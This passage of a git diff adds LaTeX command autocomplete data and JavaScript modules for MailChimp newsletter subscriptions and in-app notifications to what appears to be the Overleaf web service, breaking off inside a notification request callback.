'aurl-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'aurl-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'aurl-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\check{}', + snippet: '\\check{$1}', + meta: 'aurl-cmd', + score: 0.0058342578961340175, + }, + { + caption: '\\space', + snippet: '\\space', + meta: 'aurl-cmd', + score: 0.023010789853665694, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'aurl-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'aurl-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'aurl-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'aurl-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'aurl-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'aurl-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'aurl-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\RequireXeTeX', + snippet: '\\RequireXeTeX', + meta: 'aurl-cmd', + score: 0.00021116765384691477, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'aurl-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'aurl-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'aurl-cmd', + score: 0.00530510025314411, + }, + ], + bchart: [ + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'bchart-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'bchart-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'bchart-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'bchart-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\scalebox{}{}', + snippet: '\\scalebox{$1}{$2}', + meta: 'bchart-cmd', + score: 0.015973401906548487, + }, + { + caption: '\\reflectbox{}', + snippet: '\\reflectbox{$1}', + meta: 'bchart-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\reflectbox', + snippet: '\\reflectbox', + meta: 'bchart-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\resizebox{}{}{}', + snippet: '\\resizebox{$1}{$2}{$3}', + meta: 'bchart-cmd', + score: 
0.017834153815870245, + }, + { + caption: '\\includegraphics[]{}', + snippet: '\\includegraphics[$1]{$2}', + meta: 'bchart-cmd', + score: 1.4595731795525781, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'bchart-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\DeclareGraphicsExtensions{}', + snippet: '\\DeclareGraphicsExtensions{$1}', + meta: 'bchart-cmd', + score: 0.0055519509468004175, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'bchart-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\graphicspath{}', + snippet: '\\graphicspath{$1}', + meta: 'bchart-cmd', + score: 0.09973951908678011, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'bchart-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'bchart-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'bchart-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\DeclareGraphicsRule{}{}{}{}', + snippet: '\\DeclareGraphicsRule{$1}{$2}{$3}{$4}', + meta: 'bchart-cmd', + score: 0.004649150613625593, + }, + { + caption: '\\ifthenelse{}{}{}', + snippet: '\\ifthenelse{$1}{$2}{$3}', + meta: 'bchart-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\ifthenelse{}', + snippet: '\\ifthenelse{$1}', + meta: 'bchart-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\setboolean{}{}', + snippet: '\\setboolean{$1}{$2}', + meta: 'bchart-cmd', + score: 0.0012203054938872515, + }, + { + caption: '\\newboolean{}', + snippet: '\\newboolean{$1}', + meta: 'bchart-cmd', + score: 0.0009170966832172938, + }, + { + caption: '\\value{}', + snippet: '\\value{$1}', + meta: 'bchart-cmd', + score: 0.01590723355124104, + }, + { + caption: '\\boolean{}', + snippet: '\\boolean{$1}', + meta: 'bchart-cmd', + score: 0.0018957469739775527, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'bchart-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'bchart-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'bchart-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\definecolors{}', + snippet: '\\definecolors{$1}', + meta: 'bchart-cmd', + score: 0.0003209840085766927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'bchart-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'bchart-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\fcolorbox{}{}{}', + snippet: '\\fcolorbox{$1}{$2}{$3}', + meta: 'bchart-cmd', + score: 0.00926923425734719, + }, + { + caption: '\\colorlet{}{}', + snippet: '\\colorlet{$1}{$2}', + meta: 'bchart-cmd', + score: 0.03654388342026623, + }, + { + caption: '\\textcolor{}{}', + snippet: '\\textcolor{$1}{$2}', + meta: 'bchart-cmd', + score: 0.20852115286477566, + }, + { + caption: '\\selectcolormodel{}', + snippet: '\\selectcolormodel{$1}', + meta: 'bchart-cmd', + score: 0.000264339771769041, + }, + { + caption: '\\rowcolors{}{}{}', + snippet: '\\rowcolors{$1}{$2}{$3}', + meta: 'bchart-cmd', + score: 0.0014120076489723356, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'bchart-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\pagecolor{}', + snippet: '\\pagecolor{$1}', + meta: 'bchart-cmd', + score: 0.0008147200475678891, + 
}, + { + caption: '\\pagecolor{}{}', + snippet: '\\pagecolor{$1}{$2}', + meta: 'bchart-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'bchart-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\definecolor{}{}{}', + snippet: '\\definecolor{$1}{$2}{$3}', + meta: 'bchart-cmd', + score: 0.16906710888680052, + }, + { + caption: '\\colorbox{}{}', + snippet: '\\colorbox{$1}{$2}', + meta: 'bchart-cmd', + score: 0.029302172361548254, + }, + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'bchart-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'bchart-cmd', + score: 0.2864294797053033, + }, + ], + pdftexcmds: [ + { + caption: '\\csname', + snippet: '\\csname', + meta: 'pdftexcmds-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'pdftexcmds-cmd', + score: 0.002958865219480927, + }, + ], + l3keys2e: [ + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'l3keys2e-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'l3keys2e-cmd', + score: 0.2864294797053033, + }, + ], + xfor: [ + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'xfor-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'xfor-cmd', + score: 0.021170869458413965, + }, + ], + accsupp: [ + { + caption: '\\RequireXeTeX', + snippet: '\\RequireXeTeX', + meta: 'accsupp-cmd', + score: 0.00021116765384691477, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'accsupp-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'accsupp-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'accsupp-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'accsupp-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'accsupp-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'accsupp-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'accsupp-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'accsupp-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'accsupp-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'accsupp-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'accsupp-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'accsupp-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'accsupp-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'accsupp-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'accsupp-cmd', + score: 0.021170869458413965, + }, + ], + trig: [ + { + caption: '\\csname', + snippet: '\\csname', + meta: 'trig-cmd', + score: 0.008565354665444157, + }, + ], + rerunfilecheck: [ + { + caption: '\\makeindex', + snippet: '\\makeindex', + meta: 'rerunfilecheck-cmd', + score: 
0.010304996748556729, + }, + { + caption: '\\index{}', + snippet: '\\index{$1}', + meta: 'rerunfilecheck-cmd', + score: 0.013774721817648336, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'rerunfilecheck-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'rerunfilecheck-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\clearpage', + snippet: '\\clearpage', + meta: 'rerunfilecheck-cmd', + score: 0.1789117552185788, + }, + { + caption: '\\global', + snippet: '\\global', + meta: 'rerunfilecheck-cmd', + score: 0.006609629561859019, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'rerunfilecheck-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'rerunfilecheck-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'rerunfilecheck-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'rerunfilecheck-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'rerunfilecheck-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'rerunfilecheck-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'rerunfilecheck-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\check{}', + snippet: '\\check{$1}', + meta: 'rerunfilecheck-cmd', + score: 0.0058342578961340175, + }, + { + caption: '\\space', + snippet: '\\space', + meta: 'rerunfilecheck-cmd', + score: 0.023010789853665694, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'rerunfilecheck-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'rerunfilecheck-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'rerunfilecheck-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'rerunfilecheck-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'rerunfilecheck-cmd', + score: 0.021170869458413965, + }, + ], + pdfescape: [ + { + caption: '\\empty', + snippet: '\\empty', + meta: 'pdfescape-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'pdfescape-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'pdfescape-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'pdfescape-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'pdfescape-cmd', + score: 0.008565354665444157, + }, + ], + infwarerr: [ + { + caption: '\\empty', + snippet: '\\empty', + meta: 'infwarerr-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\check{}', + snippet: '\\check{$1}', + meta: 'infwarerr-cmd', + score: 0.0058342578961340175, + }, + { + caption: '\\space', + snippet: '\\space', + meta: 'infwarerr-cmd', + score: 0.023010789853665694, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'infwarerr-cmd', + score: 0.008565354665444157, + }, + ], + kvsetkeys: [ + { + caption: '\\empty', + snippet: '\\empty', + meta: 'kvsetkeys-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'kvsetkeys-cmd', + score: 
0.00530510025314411, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'kvsetkeys-cmd', + score: 0.008565354665444157, + }, + ], + gettitlestring: [ + { + caption: '\\addcontentsline{}{}{}', + snippet: '\\addcontentsline{$1}{$2}{$3}', + meta: 'gettitlestring-cmd', + score: 0.07503475348393239, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'gettitlestring-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'gettitlestring-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'gettitlestring-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'gettitlestring-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'gettitlestring-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'gettitlestring-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'gettitlestring-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'gettitlestring-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'gettitlestring-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'gettitlestring-cmd', + score: 0.021170869458413965, + }, + ], + refcount: [ + { + caption: '\\thepage', + snippet: '\\thepage', + meta: 'refcount-cmd', + score: 0.0591555998103519, + }, + ], + bitset: [ + { + caption: '\\empty', + snippet: '\\empty', + meta: 'bitset-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'bitset-cmd', + score: 0.008565354665444157, + }, + ], + etexcmds: [ + { + caption: '\\csname', + snippet: '\\csname', + meta: 'etexcmds-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'etexcmds-cmd', + score: 0.002958865219480927, + }, + ], + intcalc: [ + { + caption: '\\empty', + snippet: '\\empty', + meta: 'intcalc-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'intcalc-cmd', + score: 0.008565354665444157, + }, + ], + hycolor: [ + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'hycolor-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'hycolor-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'hycolor-cmd', + score: 0.00530510025314411, + }, + ], +} diff --git a/services/web/app/src/Features/Newsletter/MailChimpClient.js b/services/web/app/src/Features/Newsletter/MailChimpClient.js new file mode 100644 index 0000000..525ef33 --- /dev/null +++ b/services/web/app/src/Features/Newsletter/MailChimpClient.js @@ -0,0 +1,68 @@ +const { fetchJson, fetchNothing } = require('@overleaf/fetch-utils') + +class MailChimpClient { + constructor(apiKey) { + this.apiKey = apiKey + this.dc = apiKey.split('-')[1] + this.baseUrl = `https://${this.dc}.api.mailchimp.com/3.0/` + this.fetchOptions = { + method: 'GET', + basicAuth: { + user: 'any', + password: this.apiKey, + }, + } + } + + async request(path, options) { + try { + const requestUrl = `${this.baseUrl}${path}` + if (options.method === 'GET') { + return await fetchJson(requestUrl, options) + } + await fetchNothing(requestUrl, options) + } catch (err) { + // if 
there's a json body in the response, expose it in the error (for compatibility with node-mailchimp)
+      const errorBody = err.body ? JSON.parse(err.body) : {}
+      const errWithBody = Object.assign(err, errorBody)
+      throw errWithBody
+    }
+  }
+
+  async get(path) {
+    return await this.request(path, this.fetchOptions)
+  }
+
+  async put(path, body) {
+    const options = Object.assign({}, this.fetchOptions)
+    options.method = 'PUT'
+    options.json = body
+
+    return await this.request(path, options)
+  }
+
+  async post(path, body) {
+    const options = Object.assign({}, this.fetchOptions)
+    options.method = 'POST'
+    options.json = body
+
+    return await this.request(path, options)
+  }
+
+  async delete(path) {
+    const options = Object.assign({}, this.fetchOptions)
+    options.method = 'DELETE'
+
+    return await this.request(path, options)
+  }
+
+  async patch(path, body) {
+    const options = Object.assign({}, this.fetchOptions)
+    options.method = 'PATCH'
+    options.json = body
+
+    return await this.request(path, options)
+  }
+}
+
+module.exports = MailChimpClient
diff --git a/services/web/app/src/Features/Newsletter/MailChimpProvider.js b/services/web/app/src/Features/Newsletter/MailChimpProvider.js
new file mode 100644
index 0000000..9310ce9
--- /dev/null
+++ b/services/web/app/src/Features/Newsletter/MailChimpProvider.js
@@ -0,0 +1,315 @@
+const logger = require('@overleaf/logger')
+const Settings = require('@overleaf/settings')
+const crypto = require('crypto')
+const OError = require('@overleaf/o-error')
+const { callbackify } = require('util')
+const MailChimpClient = require('./MailChimpClient')
+
+function mailchimpIsConfigured() {
+  return Settings.mailchimp != null && Settings.mailchimp.api_key != null
+}
+
+function make(listName, listId) {
+  let provider
+  if (!mailchimpIsConfigured() || !listId) {
+    logger.debug({ listName }, 'Using newsletter provider: none')
+    provider = makeNullProvider(listName)
+  } else {
+    logger.debug({ listName }, 'Using newsletter provider: mailchimp')
+    provider = makeMailchimpProvider(listName, listId)
+  }
+  return {
+    subscribed: callbackify(provider.subscribed),
+    subscribe: callbackify(provider.subscribe),
+    unsubscribe: callbackify(provider.unsubscribe),
+    changeEmail: callbackify(provider.changeEmail),
+    tag: callbackify(provider.tag),
+    removeTag: callbackify(provider.removeTag),
+    promises: provider,
+  }
+}
+
+module.exports = {
+  make,
+}
+
+class NonFatalEmailUpdateError extends OError {
+  constructor(message, oldEmail, newEmail) {
+    super(message, { oldEmail, newEmail })
+  }
+}
+
+function makeMailchimpProvider(listName, listId) {
+  const mailchimp = new MailChimpClient(Settings.mailchimp.api_key)
+  const MAILCHIMP_LIST_ID = listId
+
+  return {
+    subscribed,
+    subscribe,
+    unsubscribe,
+    changeEmail,
+    tag,
+    removeTag,
+  }
+
+  async function subscribed(user) {
+    try {
+      const path = getSubscriberPath(user.email)
+      const result = await mailchimp.get(path)
+      return result?.status === 'subscribed'
+    } catch (err) {
+      if (err?.response?.status === 404) {
+        return false
+      }
+      throw OError.tag(err, 'error getting newsletter subscription status', {
+        userId: user._id,
+        listName,
+      })
+    }
+  }
+
+  async function subscribe(user) {
+    try {
+      const path = getSubscriberPath(user.email)
+      await mailchimp.put(path, {
+        email_address: user.email,
+        status: 'subscribed',
+        status_if_new: 'subscribed',
+        merge_fields: getMergeFields(user),
+      })
+      logger.debug(
+        { user, listName },
+        'finished subscribing user to newsletter'
+      )
+    } catch (err) {
+      throw OError.tag(err, 'error subscribing user to newsletter', {
+        userId: user._id,
+        listName,
+      })
+    }
+  }
+
+  async function tag(user, tag) {
+    try {
+      const path = getMemberTagsPath(user.email)
+      await mailchimp.post(path, {
+        tags: [{ name: tag, status: 'active' }],
+      })
+      logger.debug({ user, listName }, `finished adding ${tag} to user`)
+    } catch (err) {
+      throw OError.tag(err, `error adding ${tag} to user`, {
+        userId: user._id,
+        listName,
+        tag,
+      })
+    }
+  }
+
+  async function removeTag(user, tag) {
+    try {
+      const path = getMemberTagsPath(user.email)
+      await mailchimp.post(path, {
+        tags: [{ name: tag, status: 'inactive' }],
+      })
+      logger.debug({ user, listName }, `finished removing ${tag} from user`)
+    } catch (err) {
+      throw OError.tag(err, `error removing ${tag} from user`, {
+        userId: user._id,
+        listName,
+        tag,
+      })
+    }
+  }
+
+  async function unsubscribe(user, options = {}) {
+    try {
+      const path = getSubscriberPath(user.email)
+      if (options.delete) {
+        await mailchimp.delete(path)
+      } else {
+        await mailchimp.patch(path, {
+          status: 'unsubscribed',
+          merge_fields: getMergeFields(user),
+        })
+      }
+      logger.debug(
+        { user, options, listName },
+        'finished unsubscribing user from newsletter'
+      )
+    } catch (err) {
+      if ([404, 405].includes(err?.response?.status)) {
+        // silently ignore users who were never subscribed (404) or previously deleted (405)
+        return
+      }
+
+      if (err.message.includes('looks fake or invalid')) {
+        logger.debug(
+          { err, user, options, listName },
+          'Mailchimp declined to unsubscribe user because it thinks the email looks fake'
+        )
+        return
+      }
+
+      throw OError.tag(err, 'error unsubscribing user from newsletter', {
+        userId: user._id,
+        listName,
+      })
+    }
+  }
+
+  async function changeEmail(user, newEmail) {
+    const oldEmail = user.email
+
+    try {
+      await updateEmailInMailchimp(user, newEmail)
+    } catch (updateError) {
+      // if we failed to update the user, delete their old email address so that
+      // we don't leave it stuck in mailchimp
+      logger.debug(
+        { oldEmail, newEmail, updateError, listName },
+        'unable to change email in newsletter, removing old email'
+      )
+
+      try {
+        await unsubscribe(user, { delete: true })
+      } catch (unsubscribeError) {
+        // something went wrong removing the user's address
+        throw OError.tag(
+          unsubscribeError,
+          'error unsubscribing old email in response to email change failure',
+          { oldEmail, newEmail, updateError, listName }
+        )
+      }
+
+      if (!(updateError instanceof NonFatalEmailUpdateError)) {
+        throw updateError
+      }
+    }
+  }
+
+  async function updateEmailInMailchimp(user, newEmail) {
+    const oldEmail = user.email
+
+    // mailchimp doesn't give us error codes, so we have to parse the message :'(
+    const errors = {
+      'merge fields were invalid': 'user has never subscribed',
+      'could not be validated':
+        'user has previously unsubscribed or new email already exists on list',
+      'is already a list member': 'new email is already on mailing list',
+      'looks fake or invalid': 'email looks fake to mailchimp',
+    }
+
+    try {
+      const path = getSubscriberPath(oldEmail)
+      await mailchimp.patch(path, {
+        email_address: newEmail,
+        merge_fields: getMergeFields(user),
+      })
+      logger.debug(
+        { newEmail, listName },
+        'finished changing email in the newsletter'
+      )
+    } catch (err) {
+      // silently ignore users who were never subscribed
+      if (err.status === 404) {
+        return
+      }
+
+      // look through expected mailchimp errors and log if we find one
+      Object.keys(errors).forEach(key => {
+        if (err.message.includes(key)) {
+          const message = `unable to change email in newsletter, ${errors[key]}`
+
+          logger.debug({ oldEmail, newEmail, listName }, message)
+
+          throw new NonFatalEmailUpdateError(
+            message,
+            oldEmail,
+            newEmail
+          ).withCause(err)
+        }
+      })
+
+      // if we didn't find an expected error, generate something to throw
+      throw OError.tag(err, 'error changing email in newsletter', {
+        oldEmail,
+        newEmail,
+        listName,
+      })
+    }
+  }
+
+  function getSubscriberPath(email) {
+    const emailHash = hashEmail(email)
+    return `/lists/${MAILCHIMP_LIST_ID}/members/${emailHash}`
+  }
+
+  function getMemberTagsPath(email) {
+    const emailHash = hashEmail(email)
+    return `/lists/${MAILCHIMP_LIST_ID}/members/${emailHash}/tags`
+  }
+
+  function hashEmail(email) {
+    return crypto.createHash('md5').update(email.toLowerCase()).digest('hex')
+  }
+
+  function getMergeFields(user) {
+    return {
+      FNAME: user.first_name,
+      LNAME: user.last_name,
+      MONGO_ID: user._id.toString(),
+    }
+  }
+}
+
+function makeNullProvider(listName) {
+  return {
+    subscribed,
+    subscribe,
+    unsubscribe,
+    changeEmail,
+    tag,
+    removeTag,
+  }
+
+  async function subscribed(user) {
+    logger.debug(
+      { user, listName },
+      'Not checking user because no newsletter provider is configured'
+    )
+    return false
+  }
+
+  async function subscribe(user) {
+    logger.debug(
+      { user, listName },
+      'Not subscribing user to newsletter because no newsletter provider is configured'
+    )
+  }
+
+  async function unsubscribe(user) {
+    logger.debug(
+      { user, listName },
+      'Not unsubscribing user from newsletter because no newsletter provider is configured'
+    )
+  }
+
+  async function changeEmail(user, newEmail) {
+    logger.debug(
+      { userId: user._id, newEmail, listName },
+      'Not changing email in newsletter for user because no newsletter provider is configured'
+    )
+  }
+  async function tag(user, tag) {
+    logger.debug(
+      { userId: user._id, tag, listName },
+      'Not tagging user because no newsletter provider is configured'
+    )
+  }
+  async function removeTag(user, tag) {
+    logger.debug(
+      { userId: user._id, tag, listName },
+      'Not removing tag for user because no newsletter provider is configured'
+    )
+  }
+}
diff --git a/services/web/app/src/Features/Newsletter/NewsletterManager.js b/services/web/app/src/Features/Newsletter/NewsletterManager.js
new file mode 100644
index 0000000..ebae9f2
--- /dev/null
+++ b/services/web/app/src/Features/Newsletter/NewsletterManager.js
@@ -0,0 +1,9 @@
+const Settings = require('@overleaf/settings')
+const MailchimpProvider = require('./MailChimpProvider')
+
+const provider = MailchimpProvider.make(
+  'newsletter',
+  Settings.mailchimp ? Settings.mailchimp.list_id : null
+)
+
+module.exports = provider
diff --git a/services/web/app/src/Features/Notifications/NotificationsBuilder.js b/services/web/app/src/Features/Notifications/NotificationsBuilder.js
new file mode 100644
index 0000000..a6fedaf
--- /dev/null
+++ b/services/web/app/src/Features/Notifications/NotificationsBuilder.js
@@ -0,0 +1,325 @@
+const NotificationsHandler = require('./NotificationsHandler')
+const { promisifyAll } = require('@overleaf/promise-utils')
+const request = require('request')
+const settings = require('@overleaf/settings')
+
+function dropboxDuplicateProjectNames(userId) {
+  return {
+    key: `dropboxDuplicateProjectNames-${userId}`,
+    create(projectName, callback) {
+      if (callback == null) {
+        callback = function () {}
+      }
+      NotificationsHandler.createNotification(
+        userId,
+        this.key,
+        'notification_dropbox_duplicate_project_names',
+        { projectName },
+        null,
+        true,
+        callback
+      )
+    },
+    read(callback) {
+      if (callback == null) {
+        callback = function () {}
+      }
+      NotificationsHandler.markAsReadWithKey(userId, this.key, callback)
+    },
+  }
+}
+
+function dropboxUnlinkedDueToLapsedReconfirmation(userId) {
+  return {
+    key: 'drobox-unlinked-due-to-lapsed-reconfirmation',
+    create(callback) {
+      NotificationsHandler.createNotification(
+        userId,
+        this.key,
+        'notification_dropbox_unlinked_due_to_lapsed_reconfirmation',
+        {},
+        null,
+        true,
+        callback
+      )
+    },
+    read(callback) {
+      NotificationsHandler.markAsReadWithKey(userId, this.key, callback)
+    },
+  }
+}
+
+function featuresUpgradedByAffiliation(affiliation, user) {
+  return {
+    key: `features-updated-by=${affiliation.institutionId}`,
+    create(callback) {
+      if (callback == null) {
+        callback = function () {}
+      }
+      const messageOpts = { institutionName: affiliation.institutionName }
+      NotificationsHandler.createNotification(
+        user._id,
+        this.key,
+        'notification_features_upgraded_by_affiliation',
+        messageOpts,
+        null,
+        false,
+        callback
+      )
+    },
+    read(callback) {
+      if (callback == null) {
+        callback = function () {}
+      }
+      NotificationsHandler.markAsReadWithKey(user._id, this.key, callback)
+    },
+  }
+}
+
+function redundantPersonalSubscription(affiliation, user) {
+  return {
+    key: `redundant-personal-subscription-${affiliation.institutionId}`,
+    create(callback) {
+      if (callback == null) {
+        callback = function () {}
+      }
+      const messageOpts = { institutionName: affiliation.institutionName }
+      NotificationsHandler.createNotification(
+        user._id,
+        this.key,
+        'notification_personal_subscription_not_required_due_to_affiliation',
+        messageOpts,
+        null,
+        false,
+        callback
+      )
+    },
+    read(callback) {
+      if (callback == null) {
+        callback = function () {}
+      }
+      NotificationsHandler.markAsReadWithKey(user._id, this.key, callback)
+    },
+  }
+}
+
+function projectInvite(invite, project, sendingUser, user) {
+  return {
+    key: `project-invite-${invite._id}`,
+    create(callback) {
+      if (callback == null) {
+        callback = function () {}
+      }
+      const messageOpts = {
+        userName: sendingUser.first_name,
+        projectName: project.name,
+        projectId: project._id.toString(),
+        token: invite.token,
+      }
+      NotificationsHandler.createNotification(
+        user._id,
+        this.key,
+        'notification_project_invite',
+        messageOpts,
+        invite.expires,
+        callback
+      )
+    },
+    read(callback) {
+      if (callback == null) {
+        callback = function () {}
+      }
+      NotificationsHandler.markAsReadByKeyOnly(this.key, callback)
+    },
+  }
+}
+
+function ipMatcherAffiliation(userId) {
+  return {
+    create(ip, callback) {
+      if (callback == null) {
+        callback = function () {}
+      }
+      if (!settings.apis.v1.url) {
+        // service is not configured
+        return callback()
+      }
+      request(
+        {
+          method: 'GET',
+          url: `${settings.apis.v1.url}/api/v2/users/${userId}/ip_matcher`,
+          auth: { user: settings.apis.v1.user, pass: settings.apis.v1.pass },
+          body: { ip },
+          json: true,
+          timeout: settings.apis.v1.timeout,
+        },
+        function (error, response, body) {
+          if (error != null) {
+            return callback(error)
+          }
+          if (response.statusCode !== 200) {
+            return callback()
